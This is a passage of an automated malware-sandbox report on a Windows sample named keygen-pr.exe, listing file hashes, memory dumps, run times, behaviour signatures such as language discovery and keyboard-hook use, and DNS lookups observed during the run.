C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bc9d57af296fb2be2e266f37b7e5bcba
SHA1 18b047ed1a147fe1df5ebb966745190906bf125e
SHA256 cb4726beb254cf40410cf703472cbed4369e59808de6b6161714e672aadd5a98
SHA512 f4a89cd4520d57f495ac2867e60593dc405757738fb7cdd99322d5b1a3c2665397f9ac1259ba7802d3890af8646dc2503cab15dbf27adbc6039fffb0cfc331ea

memory/1708-406-0x0000000003F30000-0x0000000004197000-memory.dmp

memory/1708-405-0x0000000003F30000-0x0000000004197000-memory.dmp

memory/1708-404-0x0000000003F30000-0x0000000004197000-memory.dmp

memory/1708-403-0x0000000003F30000-0x0000000004197000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

N/A